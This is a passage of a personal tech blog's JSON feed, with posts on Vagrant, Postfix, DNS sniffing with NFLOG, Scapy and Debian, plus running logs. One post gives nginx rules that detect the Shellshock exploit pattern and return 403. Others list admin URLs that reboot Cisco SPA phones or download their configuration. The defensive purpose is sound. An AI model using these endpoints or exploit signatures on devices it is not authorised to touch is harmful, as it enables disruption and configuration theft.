", "url": "https://blog.x-way.org/Coding/2019/01/01/New-Year-New-Vim-Trick.html", "tags": ["Coding"], "date_published": "2019-01-01T22:24:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324264", "title": "The Swiss Army Knife of Hashmaps", "content_text": "The Swiss Army Knife of Hashmaps — a very nice article from Ravi Shankar explaining how Google's SwissTable concept was implemented for Rust.", "content_html": "The Swiss Army Knife of Hashmaps — a very nice article from Ravi Shankar explaining how Google's SwissTable concept was implemented for Rust.
", "url": "https://blog.x-way.org/Coding/2018/12/08/The-Swiss-Army-Knife-of-Hashmaps.html", "tags": ["Coding"], "date_published": "2018-12-08T06:41:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324263", "title": "Run QRadar CE on Mac OS X with Vagrant", "content_text": "The Vagrant file provided by IBM for running QRadar Community Edition on Mac OS X currently does not work properly. It fails with the following error:Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.http://mirror.centos.org/centos/7/storage/x86_64/gluster-3.8/repodata/repomd.xml: [Errno 14] HTTP Error 404The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.Based on the workaround described here, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.With the modified Vagrantfile the automatic provisioning script no longer fails.The instructions for running QRadar CE with Vagrant now look like this:Download the zipfile with the original Vagrantfile and the accompanying helper files from the IBM website: https://developer.ibm.com/qradar/ce/Create a folder and extract the zipfile:mkdir community_editionunzip QRadarCE_Vagrantfile.20171003084145.zip -d community_edition/Download the modified Vagrantfile and overwrite the original one:curl -o community_edition/Vagrantfile https://blog.x-way.org/stuff/VagrantfileMake sure you have the requried Vagrant plugins installed:vagrant plugin install vagrant-disksizevagrant plugin install vagrant-reloadMake sure you have the QRadar CE ISO file (downloaded from the IBM website) in the same folder as the Vagrantfile:cp QRadarCE.iso community_edition/Create the auto_install file to automatically install QRadar:touch community_edition/auto_installAccept the EULA by adding the corresponding setup parameter in the Vagrantfile:Edit the Vagrantfile and add the --accept-eula argument to /media/cdrom/setup --no-screen to automatically accept the EULAChange into the folder and start the QRadar installation (takes about 1 hour):cd community_editionvagrant up", "content_html": "The Vagrant file provided by IBM for running QRadar Community Edition on Mac OS X currently does not work properly. It fails with the following error:
Failure: repodata/repomd.xml from centos-gluster38: [Errno 256] No more mirrors to try.http://mirror.centos.org/centos/7/storage/x86_64/gluster-3.8/repodata/repomd.xml: [Errno 14] HTTP Error 404
The problem is that gluster3.8 was moved out of this CentOS repository and now the download fails.But the gluster3.8 RPMs are also provided with the QRadar CE installation ISO file.
Based on the workaround described here, I've extended the IBM provided Vagrantfile so that the RPMs are taken from the ISO file instead of the CentOS repository.With the modified Vagrantfile the automatic provisioning script no longer fails.
The instructions for running QRadar CE with Vagrant now look like this:
mkdir community_editionunzip QRadarCE_Vagrantfile.20171003084145.zip -d community_edition/
curl -o community_edition/Vagrantfile https://blog.x-way.org/stuff/Vagrantfile
vagrant plugin install vagrant-disksizevagrant plugin install vagrant-reload
cp QRadarCE.iso community_edition/
touch community_edition/auto_install
cd community_editionvagrant up
Added another interesting blog to the Links: benjojo.co.uk
Ben builds and writes about a lot of funny small projects:
Postfix provides the reject_unknown_sender_domain check which allows to only accept incoming e-mails sent from domains which actually exist.
Unfortunately there exists this one external service which uses a non-existing subdomain to send their notification e-mails. Thus all their notifications get rejected.
The following configuration allows to keep the reject_unknown_sender_domain check in place, but to exclude a specific domain from this check.
# snippet in main.cfsmtpd_sender_restrictions = check_sender_access pcre:/etc/postfix/sender_domain_verification
# exclude regex in sender_domain_verification!/@domain\\.to\\.exclude\\.com$/ reject_unknown_sender_domain
Your distribution might ship Postfix support for pcre matches in a dedicated package which needs to be installed separately (in the case of Debian you need to install the postfix-pcre package).
", "url": "https://blog.x-way.org/Linux/2018/04/04/Exclude-domain-from-unknown-sender-check.html", "tags": ["Linux"], "date_published": "2018-04-04T23:03:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324259", "title": "Blogroll update", "content_text": "Added the following blogs to the Links:\tThoughts on programming\teklitzke.org\trachelbythebay.comSeems like the blog/RSS thing is getting traction again: It's Time for an RSS Revival (via)", "content_html": "Added the following blogs to the Links:
Seems like the blog/RSS thing is getting traction again: It's Time for an RSS Revival (via)
", "url": "https://blog.x-way.org/Misc/2018/04/01/Blogroll-update.html", "tags": ["Misc"], "date_published": "2018-04-01T21:52:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324258", "title": "nflog_sniff extended with C++ implementation", "content_text": "With nflog_sniffer.cpp I've just added a C++ implementation to the nflog_sniff repository.It uses the lean (and apparently also very fast) libtins library.", "content_html": "With nflog_sniffer.cpp I've just added a C++ implementation to the nflog_sniff repository.
It uses the lean (and apparently also very fast) libtins library.
", "url": "https://blog.x-way.org/Networking/2015/12/05/nflog_sniff-extended-with-C---implementation.html", "tags": ["Networking"], "date_published": "2015-12-05T11:58:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324257", "title": "DNS packet sniffing with NFLOG and Perl/Python", "content_text": "The nflog-bindings from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123Then start one of the sniffer scripts and observe the extracted DNS queries :-)For a more convenient download I've also put the scripts in a proper Github repository: nflog_sniff", "content_html": "The nflog-bindings from Pierre Chifflier make it trivially easy to write a passive packet sniffer which can be controlled via iptables and listens to traffic on multiple interfaces at the same time.
As a little exercise I have written a simple DNS packet sniffer, once in Perl and once in Python:
To use the sniffer, first create an iptables rule like this: iptables -I INPUT -p udp --sport 53 -j NFLOG --nflog-group 123
Then start one of the sniffer scripts and observe the extracted DNS queries :-)
For a more convenient download I've also put the scripts in a proper Github repository: nflog_sniff
", "url": "https://blog.x-way.org/Networking/2015/12/04/DNS-packet-sniffing-with-NFLOG-and-Perl-Python.html", "tags": ["Networking"], "date_published": "2015-12-04T20:10:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324256", "title": "Mutt Homebrew Formula extended with indexcolor patch", "content_text": "I've just added the indexcolor patch to my Mutt 1.5.24 Homebrew Formula.To use this Formula just type brew tap x-way/mutt followed by brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch to install Mutt 1.5.24 with trash_folder and indexcolor support.", "content_html": "I've just added the indexcolor patch to my Mutt 1.5.24 Homebrew Formula.
To use this Formula just type brew tap x-way/mutt followed by brew install x-way/mutt/mutt --with-trash-patch --with-indexcolor-patch to install Mutt 1.5.24 with trash_folder and indexcolor support.
", "url": "https://blog.x-way.org/Linux/2015/11/03/Mutt-Homebrew-Formula-extended-with-indexcolor-patch.html", "tags": ["Linux"], "date_published": "2015-11-03T20:18:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324255", "title": "Homebrew Tap for Mutt 1.5.24 with trash_folder patch", "content_text": "At work I'm a quite avid user of Mutt. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.I'm using Homebrew to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: mutt-1.5.24-trash_folder.diff.The official Homebrew repository prefers unpatched packages and encourages the creation of independent \"Taps\" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: x-way/homebrew-mutt.To use this Tap just type brew tap x-way/mutt followed by brew install x-way/mutt/mutt --with-trash-patch to install Mutt 1.5.24 with trash_folder support. Cheers!", "content_html": "At work I'm a quite avid user of Mutt. Unfortunately the upgrade to the recently released version 1.5.24 did not go over as smooth as expected.
I'm using Homebrew to install Mutt on Mac OS X, and even though there is an updated version in the official Homebrew repository, it no longer comes with the trash_folder patch (it fails to apply against the 1.5.24 source tree and was thus removed).
In order to build the new Mutt version with the trash_folder support, I updated the patch for version 1.5.24: mutt-1.5.24-trash_folder.diff.
The official Homebrew repository prefers unpatched packages and encourages the creation of independent \"Taps\" (package repositories) for patched packages. Thus I also created my own Homebrew Tap which contains the 1.5.24 version of Mutt with the updated trash_folder patch: x-way/homebrew-mutt.
To use this Tap just type brew tap x-way/mutt followed by brew install x-way/mutt/mutt --with-trash-patch to install Mutt 1.5.24 with trash_folder support. Cheers!
", "url": "https://blog.x-way.org/Linux/2015/09/23/Homebrew-Tap-for-Mutt-1-5-24-with-trash_folder-patch.html", "tags": ["Linux"], "date_published": "2015-09-23T22:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324254", "title": "Puppet Infrastructure 2015", "content_text": "Puppet Infrastructure 2015", "content_html": "", "url": "https://blog.x-way.org/Linux/2015/08/15/Puppet-Infrastructure-2015.html", "tags": ["Linux"], "date_published": "2015-08-15T06:47:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324253", "title": "Downgrade Quagga on Debian 8", "content_text": "The Quagga version in Debian 8 (v0.99.23.1) suffers from a bug in ospf6d, which causes that no IPv6 routes are exchanged via point-to-point interfaces.In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.Entry to add to /etc/apt/sources.list:deb http://mirror.switch.ch/ftp/mirror/debian/ oldstable mainEntry to add to /etc/apt/preferences:Package: quaggaPin: version 0.99.22.*Pin-Priority: 1001After the entries have been added, run apt-get update followed by apt-get install quagga to downgrade to the old quagga package.", "content_html": "The Quagga version in Debian 8 (v0.99.23.1) suffers from a bug in ospf6d, which causes that no IPv6 routes are exchanged via point-to-point interfaces.
In order to workaround this problem (and re-establish IPv6 connectivity), a downgrade of the quagga package can be done.
For this we add the 'oldstable' entry to sources.list and pin the quagga package to the old version.
Entry to add to /etc/apt/sources.list:
deb http://mirror.switch.ch/ftp/mirror/debian/ oldstable main
Entry to add to /etc/apt/preferences:
Package: quaggaPin: version 0.99.22.*Pin-Priority: 1001
After the entries have been added, run apt-get update followed by apt-get install quagga to downgrade to the old quagga package.
", "url": "https://blog.x-way.org/Linux/2015/08/12/Downgrade-Quagga-on-Debian-8.html", "tags": ["Linux"], "date_published": "2015-08-12T04:11:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324252", "title": "fsociety00.dat", "content_text": "fsociety00.dat", "content_html": "", "url": "https://blog.x-way.org/Misc/2015/07/19/fsociety00-dat.html", "tags": ["Misc"], "date_published": "2015-07-19T23:44:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324251", "title": "Scapy and IP Options", "content_text": "Create packets with custom IPv4 IP Option fields using Scapy:>>> packet=IP(src=\"203.0.113.1\",dst=\"203.0.113.2\",options=[IPOption('%s%s'%('\\x86\\x28','a'*38))])>>> ls(packet)version : BitField = 4 (4)ihl : BitField = None (None)tos : XByteField = 0 (0)len : ShortField = None (None)id : ShortField = 1 (1)flags : FlagsField = 0 (0)frag : BitField = 0 (0)ttl : ByteField = 64 (64)proto : ByteEnumField = 0 (0)chksum : XShortField = None (None)src : Emph = '203.0.113.1' (None)dst : Emph = '203.0.113.2' ('127.0.0.1')options : PacketListField = [<IPOption copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |>] ([])>>> sr1(packet)The above code results in the following packet (as seen by Wireshark):", "content_html": "Create packets with custom IPv4 IP Option fields using Scapy:
>>> packet=IP(src=\"203.0.113.1\",dst=\"203.0.113.2\",options=[IPOption('%s%s'%('\\x86\\x28','a'*38))])>>> ls(packet)version : BitField = 4 (4)ihl : BitField = None (None)tos : XByteField = 0 (0)len : ShortField = None (None)id : ShortField = 1 (1)flags : FlagsField = 0 (0)frag : BitField = 0 (0)ttl : ByteField = 64 (64)proto : ByteEnumField = 0 (0)chksum : XShortField = None (None)src : Emph = '203.0.113.1' (None)dst : Emph = '203.0.113.2' ('127.0.0.1')options : PacketListField = [<IPOption copy_flag=1L optclass=control option=commercial_security length=40 value='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' |>] ([])>>> sr1(packet)
The above code results in the following packet (as seen by Wireshark):
", "url": "https://blog.x-way.org/Networking/2015/07/12/Scapy-and-IP-Options.html", "tags": ["Networking"], "date_published": "2015-07-12T23:56:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324250", "title": "Upgrade to Debian 8 without systemd", "content_text": "To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the systemd-sysv package.This can be done by creating a file /etc/apt/preferences.d/no-systemd-sysv with the following content:Package: systemd-sysvPin: release o=DebianPin-Priority: -1(via)", "content_html": "To avoid the automatic installation/switch to systemd during the upgrade to Debian 8, it is enough to prevent the installation of the systemd-sysv
package.
This can be done by creating a file /etc/apt/preferences.d/no-systemd-sysv
with the following content:
Package: systemd-sysvPin: release o=DebianPin-Priority: -1
(via)
", "url": "https://blog.x-way.org/Linux/2015/07/11/Upgrade-to-Debian-8-without-systemd.html", "tags": ["Linux"], "date_published": "2015-07-11T11:27:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324249", "title": "Obey the cloud!", "content_text": "So true...\"Obey the cloud!\" by Johannes Kretzschmar, licensed under CC BY-NC-SA 3.0.", "content_html": "So true...
\"Obey the cloud!\" by Johannes Kretzschmar, licensed under CC BY-NC-SA 3.0.
", "url": "https://blog.x-way.org/Misc/2015/07/05/Obey-the-cloud.html", "tags": ["Misc"], "date_published": "2015-07-05T17:22:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324248", "title": "The Day Is My Enemy", "content_text": "Looking forward to see the live performance at the Future Music Festival 2015 :-)", "content_html": "Looking forward to see the live performance at the Future Music Festival 2015 :-)
", "url": "https://blog.x-way.org/Music/2015/02/25/The-Day-Is-My-Enemy.html", "tags": ["Music"], "date_published": "2015-02-25T03:08:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324247", "title": "Hand-crafted IP packets", "content_text": "(via)", "content_html": "(via)
", "url": "https://blog.x-way.org/Networking/2015/01/11/Hand-crafted-IP-packets.html", "tags": ["Networking"], "date_published": "2015-01-11T23:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324246", "title": "Christmas Run", "content_text": "Run #9 around Centennial Park. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)Centennial Midday Run 2x", "content_html": "Run #9 around Centennial Park. Two rounds again, this time during noon with some nice sun and a whopping 30°C :-)
", "url": "https://blog.x-way.org/Misc/2014/12/25/Christmas-Run.html", "tags": ["Misc"], "date_published": "2014-12-25T12:16:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324245", "title": "Advent Run #8", "content_text": "Run #8 around Centennial Park. Two rounds again, and with some rain :-(Centennial Morning Run 2x", "content_html": "Run #8 around Centennial Park. Two rounds again, and with some rain :-(
", "url": "https://blog.x-way.org/Misc/2014/12/22/Advent-Run-8.html", "tags": ["Misc"], "date_published": "2014-12-22T23:35:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324244", "title": "Advent Run #7", "content_text": "Run #7 around Centennial Park. Only one round, but the fastest one so far.Centennial Morning Run", "content_html": "Run #7 around Centennial Park. Only one round, but the fastest one so far.
", "url": "https://blog.x-way.org/Misc/2014/12/19/Advent-Run-7.html", "tags": ["Misc"], "date_published": "2014-12-19T23:21:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324243", "title": "Advent Run #6", "content_text": "Run #6 around Centennial Park. Two rounds this time, with a slower pace though.Centennial Morning Run 2x", "content_html": "Run #6 around Centennial Park. Two rounds this time, with a slower pace though.
", "url": "https://blog.x-way.org/Misc/2014/12/16/Advent-Run-6.html", "tags": ["Misc"], "date_published": "2014-12-16T23:31:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324242", "title": "Advent Run #5", "content_text": "Run #5 around Centennial Park. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.Centennial Morning Run", "content_html": "Run #5 around Centennial Park. Didn't have the patience to wait for the GPS to lock onto the signal, thus the late start.
", "url": "https://blog.x-way.org/Misc/2014/12/12/Advent-Run-5.html", "tags": ["Misc"], "date_published": "2014-12-12T22:51:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324241", "title": "Advent Run #4", "content_text": "Run #4 around Centennial Park, this time a bit later and thus with more sun:Centennial Morning Run", "content_html": "Run #4 around Centennial Park, this time a bit later and thus with more sun:
", "url": "https://blog.x-way.org/Misc/2014/12/10/Advent-Run-4.html", "tags": ["Misc"], "date_published": "2014-12-10T23:14:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324240", "title": "Advent Run #3", "content_text": "Another run around Centennial Park, this time counterclockwise:Centennial Morning Run", "content_html": "Another run around Centennial Park, this time counterclockwise:
", "url": "https://blog.x-way.org/Misc/2014/12/09/Advent-Run-3.html", "tags": ["Misc"], "date_published": "2014-12-09T22:53:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324239", "title": "Advent Run #2", "content_text": "Next run around the beautiful Centennial Park:Centennial Morning Run", "content_html": "Next run around the beautiful Centennial Park:
", "url": "https://blog.x-way.org/Misc/2014/12/03/Advent-Run-2.html", "tags": ["Misc"], "date_published": "2014-12-03T22:43:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324237", "title": "Advent Run #1", "content_text": "The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)Centennial Morning Run", "content_html": "The nice thing of being in Sydney during December is that you can go running during christmas time and it is 22°C :-)
", "url": "https://blog.x-way.org/Misc/2014/12/01/Advent-Run-1.html", "tags": ["Misc"], "date_published": "2014-12-01T21:34:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324236", "title": "Regex Crossword", "content_text": "Regex Crossword (via)", "content_html": "", "url": "https://blog.x-way.org/Coding/2014/11/30/Regex-Crossword.html", "tags": ["Coding"], "date_published": "2014-11-30T21:55:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324235", "title": "The UNIX System", "content_text": "The UNIX System: Making Computers More Productive, 1982, Bell Laboratories", "content_html": "The UNIX System: Making Computers More Productive, 1982, Bell Laboratories
", "url": "https://blog.x-way.org/Linux/2014/11/24/The-UNIX-System.html", "tags": ["Linux"], "date_published": "2014-11-24T23:26:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324234", "title": "SixSpotting", "content_text": "SixSpotting, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.", "content_html": "SixSpotting, a funny little game where you collect points by logging in from as many IPv6 enabled providers as possible.
", "url": "https://blog.x-way.org/Networking/2014/11/02/SixSpotting.html", "tags": ["Networking"], "date_published": "2014-11-02T08:43:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324233", "title": "Show Shellshock the door", "content_text": "Lately the requests trying to exploit the Shellshock vulnerability are getting annoying.Of course my hosts are patched — even before the first such request arrived — and they are using Dash as /bin/sh anyway.But this does not stop attackers from sending those requests.Some even seem to have programmed a loop which sends request after request even though their exploit is not working.Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the nginx config snippet below.It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.if ( $http_referer ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_user_agent ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_cookie ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_host ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $args ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $content_type ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $remote_user ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $request ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $request_body ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}", "content_html": "Lately the requests trying to exploit the Shellshock vulnerability are getting annoying.Of course my hosts are patched — even before the first such request arrived — and they are using Dash as /bin/sh anyway.
But this does not stop attackers from sending those requests.Some even seem to have programmed a loop which sends request after request even though their exploit is not working.
Since most of the requests are for valid URLs, the webserver just replies with a 200 status code and serves the content.As this gives no indication to the attacker whether his exploit worked or not, he has no reason to remove the host from his target-list and thus continues to send requests.
To break this pattern and signal that the host is not vulnerable to Shellshock, I came up with the nginx config snippet below.It recognizes Shellshock patterns in a request and replies with a '403 Forbidden' status code, thus indicating to an attacker that his request was blocked.
if ( $http_referer ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_user_agent ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_cookie ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $http_host ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $args ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $content_type ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $remote_user ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $request ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}if ( $request_body ~ ^\\s*\\(\\s*\\)\\s*\\{ ) { return 403 \"Blocked by Shellshock protection (https://blog.x-way.org/Show-Shellshock-the-door).\";}", "url": "https://blog.x-way.org/Networking/2014/10/18/Show-Shellshock-the-door.html", "tags": ["Networking"], "date_published": "2014-10-18T18:45:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324232", "title": "Inspect CSR with OpenSSL", "content_text": "Before sending a CSR off to your CA, it is worth checking that all parameters are correct.Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.This can be done with the following OpenSSL command:openssl req -noout -text -in <your_CSR_file>", "content_html": "
Before sending a CSR off to your CA, it is worth checking that all parameters are correct.
Especially you should make sure that the requested signature algorithm is SHA256 and not the deprecated SHA1.
This can be done with the following OpenSSL command:
openssl req -noout -text -in <your_CSR_file>", "url": "https://blog.x-way.org/Linux/2014/10/17/Inspect-CSR-with-OpenSSL.html", "tags": ["Linux"], "date_published": "2014-10-17T10:45:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324231", "title": "Blueprint of IKEA", "content_text": "Spot-on representation of every IKEA store's layout:", "content_html": "
Spot-on representation of every IKEA store's layout:
", "url": "https://blog.x-way.org/Misc/2014/10/13/Blueprint-of-IKEA.html", "tags": ["Misc"], "date_published": "2014-10-13T06:38:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324230", "title": "NORWAY - A Time-Lapse Adventure", "content_text": "SEASONS of NORWAY - A Time-Lapse Adventure from Rustad Media on Vimeo. (via)", "content_html": "SEASONS of NORWAY - A Time-Lapse Adventure from Rustad Media on Vimeo. (via)
", "url": "https://blog.x-way.org/Misc/2014/10/05/NORWAY-A-Time-Lapse-Adventure.html", "tags": ["Misc"], "date_published": "2014-10-05T08:38:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324229", "title": "How to enable SNMP on a Cisco SLM2008 Smart Switch", "content_text": "The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a smart guy on to the Cisco support forum found out how to manipulate the proprietary config file such that it enables the SNMP daemon:\tConfigure your switch with everything you need\tDownload enable_snmp.pl\tRun # perl enable_snmp.pl <IP of your switch>\tEnjoy the SNMP export from the SLM2008 :-)As this is a non-official hack, there are some limitations:\tThe embedded SNMP daemon only supports read accces and no SNMP Traps.\tChanging a setting on the 'System' configuration tab disables the SNMP daemon again (thus the script will need to be run again).", "content_html": "The Cisco SMB SLM2008 Smart Switch does normally not support SNMP and there is also no setting in the configuration interface which would enable SNMP.
But nevertheless the firmware does actually contain a SNMP daemon. Thus it is not surprising that a smart guy on to the Cisco support forum found out how to manipulate the proprietary config file such that it enables the SNMP daemon:
# perl enable_snmp.pl <IP of your switch>
As this is a non-official hack, there are some limitations:
The Cyborgs is a two man 'elektrock' boogie band.
Thank you Sat Rocks for showing me their music :-)
Today I did some cleanup of my legacy infrastructure. The repositories formerly located at cvs.x-way.org and svn.x-way.org have been converted to Git and are now available at git.x-way.org.
Also is git.x-way.org now no longer served by the old gitweb.cgi but by the fantastic GitBucket (a lightweight, self-contained GitHub clone written in Scala).
", "url": "https://blog.x-way.org/Misc/2014/09/28/CVS-and-SVN-repositories-moved-to-Git.html", "tags": ["Misc"], "date_published": "2014-09-28T20:01:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324226", "title": "Netflix in Switzerland via IPv6", "content_text": "Since last week Netflix is also available in Switzerland. The future has arrived one could say.Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)Swiss providers are probably seeing quite an increase in IPv6 traffic this month.", "content_html": "Since last week Netflix is also available in Switzerland. The future has arrived one could say.
Not only gives this easy access to TV shows and movies but also is this access provided via IPv6.
As you can see on the graph below, this brings IPv6 out of slumber and into primetime :-)
Swiss providers are probably seeing quite an increase in IPv6 traffic this month.
The about page now features some fancy blog statistics, check it out :-)
The statistics are created with the help of Cal-Heatmap which allows to easily create calendar heatmaps similar to the activity heatmap of GitHub.
Update: couldn't stop playing around and thus added another chart, this time with the help of C3.js (a D3.js based reusable chart library).
", "url": "https://blog.x-way.org/Webdesign/2014/09/12/Fancy-blog-statistics.html", "tags": ["Webdesign"], "date_published": "2014-09-12T14:48:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324223", "title": "Sipura/Linksys/Cisco SPA901 SPA3102 reboot phone", "content_text": "SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):http://<PHONEIP>/admin/reboot", "content_html": "SPA901 and SPA3102 phones can be rebooted by calling the following URL (which triggers an automatic config resync after the reboot):
http://<PHONEIP>/admin/reboot", "url": "https://blog.x-way.org/Networking/2014/09/04/Sipura-Linksys-Cisco-SPA901-SPA3102-reboot-phone.html", "tags": ["Networking"], "date_published": "2014-09-04T10:42:00+00:00" }, { "id": "http://waterwave.ch/weblog/detail.php?id=324222", "title": "Sipura/Linksys/Cisco SPA901 SPA3102 download current configuration", "content_text": "The current configuration of an SPA901 phone can be downloaded like this:http://<PHONEIP>/admin/spacfg.xmlFor SPA3102 devices the URL is different:http://<PHONEIP>/admin/config.xml", "content_html": "
The current configuration of an SPA901 phone can be downloaded like this:
http://<PHONEIP>/admin/spacfg.xml
For SPA3102 devices the URL is different:
